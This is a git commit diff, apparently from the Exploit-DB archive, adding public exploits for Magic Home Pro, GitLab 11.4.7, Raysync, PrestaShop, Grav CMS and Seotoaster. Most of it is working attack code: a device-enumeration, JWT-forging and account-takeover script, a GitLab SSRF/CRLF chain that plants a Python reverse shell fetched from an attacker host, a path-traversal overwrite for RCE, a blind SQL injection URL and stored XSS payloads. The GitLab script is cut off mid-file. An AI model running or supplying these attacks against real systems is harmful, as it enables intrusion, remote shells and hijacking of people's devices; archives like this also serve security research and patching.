DB: 2020-12-17
6 changes to exploits/shellcodes Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption Adobe (Multiple Products) - XML Injection File Content Disclosure GitLab 11.4.7 - Remote Code Execution (Authenticated) Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting Raysync 3.3.3.8 - RCE Magic Home Pro 1.5.1 - Authentication Bypass PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection Seotoaster 3.2.0 - Stored XSS on Edit page properties
This commit is contained in:
parent
c487e85d00
commit
58ad270f64
7 changed files with 675 additions and 2 deletions
292
exploits/android/webapps/49266.py
Executable file
292
exploits/android/webapps/49266.py
Executable file
|
@ -0,0 +1,292 @@
|
||||||
|
# Exploit Title: Magic Home Pro 1.5.1 - Authentication Bypass
|
||||||
|
# Google Dork: NA
|
||||||
|
# Date: 22 October 2020
|
||||||
|
# Exploit Author: Victor Hanna (Trustwave SpiderLabs)
|
||||||
|
# Author Github Page: https://9lyph.github.io/CVE-2020-27199/
|
||||||
|
# Vendor Homepage: http://www.zengge.com/appkzd
|
||||||
|
# Software Link: https://play.google.com/store/apps/details?id=com.zengge.wifi&hl=en
|
||||||
|
# Version: 1.5.1 (REQUIRED)
|
||||||
|
# Tested on: Android 10
|
||||||
|
|
||||||
|
## Enumeration ##
|
||||||
|
|
||||||
|
import requests
|
||||||
|
import json
|
||||||
|
import os
|
||||||
|
from colorama import init
|
||||||
|
from colorama import Fore, Back, Style
|
||||||
|
import re
|
||||||
|
|
||||||
|
'''
|
||||||
|
1. First Stage Authentication
|
||||||
|
2. Second Stage Enumerate
|
||||||
|
3. Third Stage Remote Execute
|
||||||
|
'''
|
||||||
|
|
||||||
|
global found_macaddresses
|
||||||
|
found_macaddresses = []
|
||||||
|
global outtahere
|
||||||
|
outtahere = ""
|
||||||
|
q = "q"
|
||||||
|
global token
|
||||||
|
|
||||||
|
|
||||||
|
def turnOn(target, token):
|
||||||
|
|
||||||
|
urlOn = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001"
|
||||||
|
array = {
|
||||||
|
"dataCommandItems":[
|
||||||
|
{"hexData":"71230fa3","macAddress":target}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
data = json.dumps(array)
|
||||||
|
headersOn = {
|
||||||
|
"User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
|
||||||
|
"Accept-Language": "en-US",
|
||||||
|
"Accept": "application/json",
|
||||||
|
"Content-Type": "application/json; charset=utf-8",
|
||||||
|
"token":token,
|
||||||
|
"Host": "wifij01us.magichue.net",
|
||||||
|
"Connection": "close",
|
||||||
|
"Accept-Encoding": "gzip, deflate"
|
||||||
|
}
|
||||||
|
print (Fore.WHITE + "[+] Sending Payload ...")
|
||||||
|
response = requests.post(urlOn, data=data, headers=headersOn)
|
||||||
|
if response.status_code == 200:
|
||||||
|
if "true" in response.text:
|
||||||
|
print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched On")
|
||||||
|
else:
|
||||||
|
print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")
|
||||||
|
|
||||||
|
def turnOff(target, token):
|
||||||
|
|
||||||
|
urlOff = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001"
|
||||||
|
array = {
|
||||||
|
"dataCommandItems":[
|
||||||
|
{"hexData":"71240fa4","macAddress":target}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
data = json.dumps(array)
|
||||||
|
headersOff = {
|
||||||
|
"User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
|
||||||
|
"Accept-Language": "en-US",
|
||||||
|
"Accept": "application/json",
|
||||||
|
"Content-Type": "application/json; charset=utf-8",
|
||||||
|
"token":token,
|
||||||
|
"Host": "wifij01us.magichue.net",
|
||||||
|
"Connection": "close",
|
||||||
|
"Accept-Encoding": "gzip, deflate"
|
||||||
|
}
|
||||||
|
print (Fore.WHITE + "[+] Sending Payload ...")
|
||||||
|
response = requests.post(urlOff, data=data, headers=headersOff)
|
||||||
|
if response.status_code == 200:
|
||||||
|
if "true" in response.text:
|
||||||
|
print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched Off")
|
||||||
|
else:
|
||||||
|
print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")
|
||||||
|
|
||||||
|
def lighItUp(target, token):
|
||||||
|
|
||||||
|
outtahere = ""
|
||||||
|
q = "q"
|
||||||
|
if len(str(target)) < 12:
|
||||||
|
print (Fore.RED + "[!] Invalid target" + Style.RESET_ALL)
|
||||||
|
elif re.match('[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}$', target.lower()):
|
||||||
|
while outtahere.lower() != q.lower():
|
||||||
|
if outtahere == "0":
|
||||||
|
turnOn(target, token)
|
||||||
|
elif outtahere == "1":
|
||||||
|
turnOff(target, token)
|
||||||
|
outtahere = input(Fore.BLUE + "ON/OFF/QUIT ? (0/1/Q): " + Style.RESET_ALL)
|
||||||
|
|
||||||
|
def Main():
|
||||||
|
urlAuth = "https://wifij01us.magichue.net/app/login/ZG001"
|
||||||
|
|
||||||
|
data = {
|
||||||
|
"userID":"<Valid Registered Email/Username>",
|
||||||
|
"password":"<Valid Registered Password>",
|
||||||
|
"clientID":""
|
||||||
|
}
|
||||||
|
|
||||||
|
headersAuth = {
|
||||||
|
"User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
|
||||||
|
"Accept-Language": "en-US",
|
||||||
|
"Accept": "application/json",
|
||||||
|
"Content-Type": "application/json; charset=utf-8",
|
||||||
|
"Host": "wifij01us.magichue.net",
|
||||||
|
"Connection": "close",
|
||||||
|
"Accept-Encoding": "gzip, deflate"
|
||||||
|
}
|
||||||
|
|
||||||
|
# First Stage Authenticate
|
||||||
|
|
||||||
|
os.system('clear')
|
||||||
|
print (Fore.WHITE + "[+] Authenticating ...")
|
||||||
|
response = requests.post(urlAuth, json=data, headers=headersAuth)
|
||||||
|
resJsonAuth = response.json()
|
||||||
|
token = (resJsonAuth['token'])
|
||||||
|
|
||||||
|
# Second Stage Enumerate
|
||||||
|
|
||||||
|
print (Fore.WHITE + "[+] Enumerating ...")
|
||||||
|
macbase = "C82E475DCE"
|
||||||
|
macaddress = []
|
||||||
|
a = ["%02d" % x for x in range(100)]
|
||||||
|
for num in a:
|
||||||
|
macaddress.append(macbase+num)
|
||||||
|
|
||||||
|
with open('loot.txt', 'w') as f:
|
||||||
|
for mac in macaddress:
|
||||||
|
urlEnum = "https://wifij01us.magichue.net/app/getBindedUserListByMacAddress/ZG001"
|
||||||
|
params = {
|
||||||
|
"macAddress":mac
|
||||||
|
}
|
||||||
|
|
||||||
|
headersEnum = {
|
||||||
|
"User-Agent": "Magic Home/1.5.1(ANDROID,9,en-US)",
|
||||||
|
"Accept-Language": "en-US",
|
||||||
|
"Content-Type": "application/json; charset=utf-8",
|
||||||
|
"Accept": "application/json",
|
||||||
|
"token": token,
|
||||||
|
"Host": "wifij01us.magichue.net",
|
||||||
|
"Connection": "close",
|
||||||
|
"Accept-Encoding": "gzip, deflate"
|
||||||
|
}
|
||||||
|
|
||||||
|
response = requests.get(urlEnum, params=params, headers=headersEnum)
|
||||||
|
resJsonEnum = response.json()
|
||||||
|
data = (resJsonEnum['data'])
|
||||||
|
if not data:
|
||||||
|
pass
|
||||||
|
elif data:
|
||||||
|
found_macaddresses.append(mac)
|
||||||
|
print (Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}")
|
||||||
|
f.write(Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}\n")
|
||||||
|
else:
|
||||||
|
print (Fore.RED + "[-] No results found!")
|
||||||
|
print(Style.RESET_ALL)
|
||||||
|
|
||||||
|
if not found_macaddresses:
|
||||||
|
print (Fore.RED + "[-] No MAC addresses retrieved")
|
||||||
|
elif found_macaddresses:
|
||||||
|
attackboolean = input(Fore.BLUE + "Would you like to Light It Up ? (y/N): " + Style.RESET_ALL)
|
||||||
|
if (attackboolean.upper() == 'Y'):
|
||||||
|
target = input(Fore.RED + "Enter a target device mac address: " + Style.RESET_ALL)
|
||||||
|
lighItUp(target, token)
|
||||||
|
elif (attackboolean.upper() == 'N'):
|
||||||
|
print (Fore.CYAN + "Sometimes, belief isn’t about what we can see. It’s about what we can’t."+ Style.RESET_ALL)
|
||||||
|
else:
|
||||||
|
print (Fore.CYAN + "The human eye is a wonderful device. With a little effort, it can fail to see even the most glaring injustice." + Style.RESET_ALL)
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
Main()
|
||||||
|
|
||||||
|
## Token Forging ##
|
||||||
|
|
||||||
|
#!/usr/local/bin/python3
|
||||||
|
|
||||||
|
import url64
|
||||||
|
import requests
|
||||||
|
import json
|
||||||
|
import sys
|
||||||
|
import os
|
||||||
|
from colorama import init
|
||||||
|
from colorama import Fore, Back, Style
|
||||||
|
import re
|
||||||
|
import time
|
||||||
|
from wsgiref.handlers import format_date_time
|
||||||
|
from datetime import datetime
|
||||||
|
from time import mktime
|
||||||
|
|
||||||
|
now = datetime.now()
|
||||||
|
stamp = mktime(now.timetuple())
|
||||||
|
|
||||||
|
'''
|
||||||
|
HTTP/1.1 200
|
||||||
|
Server: nginx/1.10.3
|
||||||
|
Content-Type: application/json;charset=UTF-8
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
"{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http:\/\/wifij01us.magichue.net\/app\/ota\/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\"\",\"userEmail\":\"\",\"userUniID\":\"\"},\"token\":\"\"}"
|
||||||
|
'''
|
||||||
|
|
||||||
|
def Usage():
|
||||||
|
print (f"Usage: {sys.argv[0]} <username> <unique id>")
|
||||||
|
|
||||||
|
def Main(user, uniqid):
|
||||||
|
os.system('clear')
|
||||||
|
print ("[+] Encoding ...")
|
||||||
|
print ("[+] Bypass header created!")
|
||||||
|
print ("HTTP/1.1 200")
|
||||||
|
print ("Server: nginx/1.10.3")
|
||||||
|
print ("Date: "+str(format_date_time(stamp))+"")
|
||||||
|
print ("Content-Type: application/json;charset=UTF-8")
|
||||||
|
print ("Connection: close\r\n\r\n")
|
||||||
|
|
||||||
|
jwt_header = '{"typ": "JsonWebToken","alg": "None"}'
|
||||||
|
jwt_data = '{"userID": "'+user+'", "uniID": "'+uniqid+'","cdpid": "ZG001","clientID": "","serverCode": "US","expireDate": 1618264850608,"refreshDate": 1613080850608,"loginDate": 1602712850608}'
|
||||||
|
jwt_headerEncoded = url64.encode(jwt_header.strip())
|
||||||
|
jwt_dataEncoded = url64.encode(jwt_data.strip())
|
||||||
|
jwtcombined = (jwt_headerEncoded.strip()+"."+jwt_dataEncoded.strip()+".")
|
||||||
|
print ("{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http://wifij01us.magichue.net/app/ota/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\""+user+"\",\"userEmail\":\""+user+"\",\"userUniID\":\""+uniqid+"\"},\"token\":\""+jwtcombined+"\"}")
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
if len(sys.argv) < 3:
|
||||||
|
Usage()
|
||||||
|
else:
|
||||||
|
Main(sys.argv[1], sys.argv[2])
|
||||||
|
|
||||||
|
## Device Takeover PoC ##
|
||||||
|
|
||||||
|
#!/usr/local/bin/python3
|
||||||
|
|
||||||
|
import url64
|
||||||
|
import requests
|
||||||
|
import json
|
||||||
|
import sys
|
||||||
|
import os
|
||||||
|
from colorama import init
|
||||||
|
from colorama import Fore, Back, Style
|
||||||
|
import re
|
||||||
|
|
||||||
|
def Usage():
|
||||||
|
print (f"Usage: {sys.argv[0]} <attacker email> <target email> <target mac address> <target forged token>")
|
||||||
|
|
||||||
|
def Main():
|
||||||
|
|
||||||
|
attacker_email = sys.argv[1]
|
||||||
|
target_email = sys.argv[2]
|
||||||
|
target_mac = sys.argv[3]
|
||||||
|
forged_token = sys.argv[4]
|
||||||
|
|
||||||
|
os.system('clear')
|
||||||
|
print (Fore.WHITE + "[+] Sending Payload ...")
|
||||||
|
url = "https://wifij01us.magichue.net/app/shareDevice/ZG001"
|
||||||
|
|
||||||
|
array = {"friendUserID":attacker_email, "macAddress":target_mac}
|
||||||
|
|
||||||
|
data = json.dumps(array)
|
||||||
|
|
||||||
|
headers = {
|
||||||
|
"User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
|
||||||
|
"Accept-Language": "en-US",
|
||||||
|
"Accept": "application/json",
|
||||||
|
"Content-Type": "application/json; charset=utf-8",
|
||||||
|
"token":forged_token,
|
||||||
|
"Host": "wifij01us.magichue.net",
|
||||||
|
"Connection": "close",
|
||||||
|
"Accept-Encoding": "gzip, deflate"
|
||||||
|
}
|
||||||
|
|
||||||
|
response = requests.post(url, data=data, headers=headers)
|
||||||
|
if response.status_code == 200:
|
||||||
|
if "true" in response.text:
|
||||||
|
print (Fore.GREEN + "[*] Target is now yours ... " + Style.RESET_ALL)
|
||||||
|
else:
|
||||||
|
print (Fore.RED + "[-] Failed to take over target !" + Style.RESET_ALL)
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
if len(sys.argv) < 5:
|
||||||
|
Usage()
|
||||||
|
else:
|
||||||
|
Main()
|
25
exploits/linux/webapps/49265.txt
Normal file
25
exploits/linux/webapps/49265.txt
Normal file
|
@ -0,0 +1,25 @@
|
||||||
|
# Exploit Title: Raysync 3.3.3.8 - RCE
|
||||||
|
# Date: 04/10/2020
|
||||||
|
# Exploit Author: XiaoLong Zhu
|
||||||
|
# Vendor Homepage: www.raysync.io
|
||||||
|
# Version: below 3.3.3.8
|
||||||
|
# Tested on: Linux
|
||||||
|
|
||||||
|
step1: run RaysyncServer.sh to build a web application on the local
|
||||||
|
|
||||||
|
environment, set admin password to 123456 , which will be write to
|
||||||
|
|
||||||
|
manage.db file.
|
||||||
|
|
||||||
|
step2: curl "file=@manage.db" http://[raysync
|
||||||
|
ip]/avatar?account=1&UserId=/../../../../config/manager.db
|
||||||
|
|
||||||
|
to override remote manage.db file in server.
|
||||||
|
|
||||||
|
step3: login in admin portal with admin/123456.
|
||||||
|
|
||||||
|
step4: create a normal file with all permissions in scope.
|
||||||
|
|
||||||
|
step5: modify RaySyncServer.sh ,add arbitrary evil command.
|
||||||
|
|
||||||
|
step6: trigger rce with clicking "reset" button
|
45
exploits/php/webapps/49264.txt
Normal file
45
exploits/php/webapps/49264.txt
Normal file
|
@ -0,0 +1,45 @@
|
||||||
|
# Exploit Title: Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting
|
||||||
|
# Date: 13-12-2020
|
||||||
|
# Exploit Author: Sagar Banwa
|
||||||
|
# Vendor Homepage: https://getgrav.org/
|
||||||
|
# Software Link: https://getgrav.org/downloads
|
||||||
|
# Version: Grav v1.6.30 - Admin v1.9.18
|
||||||
|
# Tested on: Windows 10/Kali Linux
|
||||||
|
# Contact: https://www.linkedin.com/in/sagarbanwa/
|
||||||
|
|
||||||
|
Step to reproduce :
|
||||||
|
|
||||||
|
1) log in to the grav-admin panel
|
||||||
|
2) Go to Pages
|
||||||
|
3) Click on Add
|
||||||
|
4) It will ask to Add Page
|
||||||
|
5) fill the following details as below
|
||||||
|
Page Title : <script>alert(1337)</script>
|
||||||
|
Folder Name : sagar_Banwa
|
||||||
|
Parent Page : /(root)
|
||||||
|
Page Template : Default
|
||||||
|
Value : yes
|
||||||
|
6) click on the Save button
|
||||||
|
7) now Click on Pages again.
|
||||||
|
8) your page name will be listed as <script>alert(1337)</script>
|
||||||
|
9) Now click on the eye button to see the XSS or you can simply go to http://127.0.0.1/grav-admin/ the XSS will pop-up
|
||||||
|
|
||||||
|
-------------------------------------
|
||||||
|
|
||||||
|
POST /grav-admin/admin/pages HTTP/1.1
|
||||||
|
Host: 127.0.0.1
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 230
|
||||||
|
Origin: http://127.0.0.1
|
||||||
|
Connection: close
|
||||||
|
Referer: http://127.0.0.1/grav-admin/admin/pages
|
||||||
|
Cookie: grav-site-a4a23f1-admin=ehrcji8qpnu8e50r839r4oe2on; grav-site-a4a23f1=u5438b49fft2b5d7610a53ne1d; grav-tabs-state={%22tab-options.routes.registration.Security%22:%22data.Security%22%2C%22tab-content.options.advanced%22:%22data.content%22}
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
|
||||||
|
data%5Btitle%5D=%3Cscript%3Ealert%281337%29%3C%2Fscript%3E&data%5Bfolder%5D=sagar_banwa&data%5Broute%5D=%2F&data%5Bname%5D=default&data%5Bvisible%5D=1&data%5Bblueprint%5D=&task=continue&admin-nonce=d488c0d8bdaf2978d50f174942d5279f
|
||||||
|
|
||||||
|
-----------------------------
|
14
exploits/php/webapps/49267.txt
Normal file
14
exploits/php/webapps/49267.txt
Normal file
|
@ -0,0 +1,14 @@
|
||||||
|
# Exploit Title: PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection
|
||||||
|
# Date: 2020-12-15
|
||||||
|
# Exploit Author: Frederic ADAM
|
||||||
|
# Author contact: contact@fadam.eu
|
||||||
|
# Vendor Homepage: https://www.prestashop.com
|
||||||
|
# Software Link: https://github.com/PrestaShop/productcomments
|
||||||
|
# Version: 4.2.0
|
||||||
|
# Tested on: Debian 10
|
||||||
|
# CVE : CVE-2020-26248
|
||||||
|
|
||||||
|
http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=[SQL]
|
||||||
|
|
||||||
|
Example:
|
||||||
|
http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(2)))a)
|
29
exploits/php/webapps/49268.txt
Normal file
29
exploits/php/webapps/49268.txt
Normal file
|
@ -0,0 +1,29 @@
|
||||||
|
# Exploit Title: Seotoaster 3.2.0 - Stored XSS on Edit page properties
|
||||||
|
# Exploit Author: Hardik Solanki
|
||||||
|
# Vendor Homepage: https://www.seotoaster.com/
|
||||||
|
# Software Link: https://crm-marketing-automation-platforms.seotoaster.com/
|
||||||
|
# Version: 3.2.0
|
||||||
|
# Tested on Windows 10
|
||||||
|
|
||||||
|
XSS ATTACK:
|
||||||
|
Cross-site Scripting (XSS) is a client-side code injection attack. The
|
||||||
|
attacker aims to execute malicious scripts in a web browser of the victim
|
||||||
|
by including malicious code in a legitimate web page or web application.
|
||||||
|
The actual attack occurs when the victim visits the web page or web
|
||||||
|
application that executes the malicious code. The web page or web
|
||||||
|
application becomes a vehicle to deliver the malicious script to the user’s
|
||||||
|
browser. Vulnerable vehicles that are commonly used for Cross-site
|
||||||
|
Scripting attacks are forums, message boards, and web pages that allow
|
||||||
|
comments.
|
||||||
|
|
||||||
|
XSS IMPACT:
|
||||||
|
1: Steal the cookie
|
||||||
|
2: User redirection to a malicious website
|
||||||
|
|
||||||
|
Vulnerable Parameters: Edit page properties
|
||||||
|
|
||||||
|
Steps to reproduce:
|
||||||
|
1: Navigate to "https://localhost/" and log in with valid credentials.
|
||||||
|
2: Then navigates/click on "Edit page properties".
|
||||||
|
3: Add the payload "*"><script>alert(document.cookie)</script>*", on "Page header H1 tag" field and click on "Save Page" button. Page Saved succesfully.
|
||||||
|
4: Hence XSS will get stored and trigger on the main home/main page.
|
262
exploits/ruby/webapps/49263.py
Executable file
262
exploits/ruby/webapps/49263.py
Executable file
|
@ -0,0 +1,262 @@
|
||||||
|
# Exploit Title: GitLab 11.4.7 Authenticated Remote Code Execution (No Interaction Required)
|
||||||
|
# Date: 15th December 2020
|
||||||
|
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
|
||||||
|
# Software Link: https://about.gitlab.com/
|
||||||
|
# POC: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
|
||||||
|
# Tested on: GitLab 11.4.7 CE
|
||||||
|
# CVE : CVE-2018-19571 (SSRF),CVE-2018-19585 (CRLF)
|
||||||
|
|
||||||
|
import requests
|
||||||
|
import re
|
||||||
|
import warnings
|
||||||
|
from bs4 import BeautifulSoup
|
||||||
|
import sys
|
||||||
|
import base64
|
||||||
|
import urllib
|
||||||
|
from random_words import RandomWords
|
||||||
|
import argparse
|
||||||
|
import os
|
||||||
|
import time
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
parser = argparse.ArgumentParser(description='GitLab 11.4.7 Authenticated RCE')
|
||||||
|
parser.add_argument('-U',help='GitLab Username')
|
||||||
|
parser.add_argument('-P',help='Gitlab Password')
|
||||||
|
parser.add_argument('-l',help='rev shell lhost')
|
||||||
|
parser.add_argument('-p',help='rev shell lport ',type=int)
|
||||||
|
args = parser.parse_args()
|
||||||
|
|
||||||
|
|
||||||
|
username = args.U
|
||||||
|
password = args.P
|
||||||
|
lhost = args.l
|
||||||
|
lport = args.p
|
||||||
|
|
||||||
|
|
||||||
|
#Retrieve CSRF Token
|
||||||
|
|
||||||
|
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
|
||||||
|
gitlab_url = "http://10.129.49.62:5080"
|
||||||
|
request = requests.Session()
|
||||||
|
print("[+] Retrieving CSRF token to submit the login form")
|
||||||
|
time.sleep(1)
|
||||||
|
page = request.get(gitlab_url+"/users/sign_in")
|
||||||
|
html_content = page.text
|
||||||
|
soup = BeautifulSoup(html_content,features="lxml")
|
||||||
|
token = soup.findAll('meta')[16].get("content")
|
||||||
|
|
||||||
|
|
||||||
|
print("[+] CSRF Token : "+token)
|
||||||
|
time.sleep(1)
|
||||||
|
|
||||||
|
|
||||||
|
#Login
|
||||||
|
|
||||||
|
login_info ={
|
||||||
|
"authenticity_token": token,
|
||||||
|
"user[login]": username,
|
||||||
|
"user[password]": password,
|
||||||
|
"user[remember_me]": "0"
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
login_request = request.post(gitlab_url+"/users/sign_in",login_info)
|
||||||
|
|
||||||
|
|
||||||
|
if login_request.status_code==200:
|
||||||
|
print("[+] Login Successful")
|
||||||
|
time.sleep(1)
|
||||||
|
|
||||||
|
else:
|
||||||
|
|
||||||
|
print("Login Failed")
|
||||||
|
print(" ")
|
||||||
|
sys.exit()
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
#Exploitation
|
||||||
|
|
||||||
|
print("[+] Running Exploit")
|
||||||
|
time.sleep(1)
|
||||||
|
print("[+] Using IPV6 URL 'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/test/ssrf.git' to bypass filter")
|
||||||
|
time.sleep(1)
|
||||||
|
|
||||||
|
ipv6_url = "git%3A%2F%2F%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A6379%2Ftest%2Fssrf.git"
|
||||||
|
|
||||||
|
|
||||||
|
r = RandomWords()
|
||||||
|
project_name = r.random_word()
|
||||||
|
project_url = '%s/%s/'%(gitlab_url,username)
|
||||||
|
|
||||||
|
print("[+] Creating Project")
|
||||||
|
time.sleep(1)
|
||||||
|
print("[+] Project Name : "+project_name)
|
||||||
|
time.sleep(1)
|
||||||
|
|
||||||
|
print("[+] Creating Python Reverse Shell")
|
||||||
|
time.sleep(1)
|
||||||
|
|
||||||
|
|
||||||
|
python_shell = 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'%(lhost,lport)
|
||||||
|
|
||||||
|
|
||||||
|
os.system("touch shell.py")
|
||||||
|
shell_file = open("shell.py","w")
|
||||||
|
shell_file.write(python_shell)
|
||||||
|
shell_file.close()
|
||||||
|
|
||||||
|
|
||||||
|
print("[+] Reverse Shell Generated")
|
||||||
|
time.sleep(1)
|
||||||
|
|
||||||
|
print("[+] Start HTTP Server in current directory")
|
||||||
|
|
||||||
|
|
||||||
|
print("Command : python3 -m http.server 80")
|
||||||
|
time.sleep(2)
|
||||||
|
|
||||||
|
http_server = raw_input("Continue (Y/N) : ")
|
||||||
|
|
||||||
|
if (http_server=="N") or (http_server=="n"):
|
||||||
|
print("Start HTTP Server before running exploit")
|
||||||
|
|
||||||
|
elif (http_server=="Y") or (http_server=="y"):
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
print("Run this script twice with options below to get SHELL!")
|
||||||
|
print("")
|
||||||
|
print("Option 1 : Download shell.py rev shell to server using wget")
|
||||||
|
print("Option 2 : Execute shell.py downloaded previously")
|
||||||
|
|
||||||
|
option = raw_input("Option (1/2) : ")
|
||||||
|
|
||||||
|
|
||||||
|
if option=="1":
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
reverse_shell= """\nmulti
|
||||||
|
sadd resque:gitlab:queues system_hook_push
|
||||||
|
lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|setsid wget http://%s/shell.py \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"
|
||||||
|
exec
|
||||||
|
exec
|
||||||
|
exec\n""" %(lhost)
|
||||||
|
|
||||||
|
|
||||||
|
project_page = request.get(gitlab_url+"/projects/new")
|
||||||
|
html_content = project_page.text
|
||||||
|
soup = BeautifulSoup(html_content,features="lxml")
|
||||||
|
project_token = soup.findAll('meta')[16].get("content")
|
||||||
|
namespace_id = soup.find('input', {'name': 'project[namespace_id]'}).get('value')
|
||||||
|
urlencoded_token1 = project_token.replace("==","%3D%3D")
|
||||||
|
urlencoded_token_final = urlencoded_token1.replace("+","%2B")
|
||||||
|
|
||||||
|
|
||||||
|
payload=b"utf8=%E2%9C%93&authenticity_token={}&project%5Bimport_url%5D={}{}&project%5Bci_cd_only%5D=false&project%5Bname%5D={}&project%5Bnamespace_id%5D={}&project%5Bpath%5D={}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0".format(urlencoded_token_final,ipv6_url,reverse_shell,project_name,namespace_id,project_name)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
proxies = {
|
||||||
|
"http" : "http://127.0.0.1:8080",
|
||||||
|
"https" : "https://127.0.0.1:8080",
|
||||||
|
}
|
||||||
|
|
||||||
|
cookies = {
|
||||||
|
'sidebar_collapsed': 'false',
|
||||||
|
'event_filter': 'all',
|
||||||
|
'hide_auto_devops_implicitly_enabled_banner_1': 'false',
|
||||||
|
'_gitlab_session':request.cookies['_gitlab_session'],
|
||||||
|
}
|
||||||
|
|
||||||
|
headers = {
|
||||||
|
'Host': '10.129.49.31:5080',
|
||||||
|
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
|
||||||
|
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
|
||||||
|
'Accept-Language': 'en-US,en;q=0.5',
|
||||||
|
'Accept-Encoding': 'gzip, deflate',
|
||||||
|
'Referer': 'http://10.129.49.31:5080/projects',
|
||||||
|
'Content-Type': 'application/x-www-form-urlencoded',
|
||||||
|
'Content-Length': '398',
|
||||||
|
'Connection': 'close',
|
||||||
|
'Upgrade-Insecure-Requests': '1',
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
#response = request.post('http://10.129.49.31:5080/projects',data=payload,proxies=proxies,cookies=cookies,headers=headers,verify=False)
|
||||||
|
|
||||||
|
response1 = request.post(gitlab_url+'/projects',data=payload,cookies=cookies,proxies=proxies,headers=headers,verify=False)
|
||||||
|
print("[+] Success!")
|
||||||
